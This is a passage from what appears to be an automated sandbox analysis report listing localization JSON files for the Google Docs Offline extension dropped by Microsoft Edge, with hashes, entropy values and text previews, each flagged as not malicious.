                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6828_938360633\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
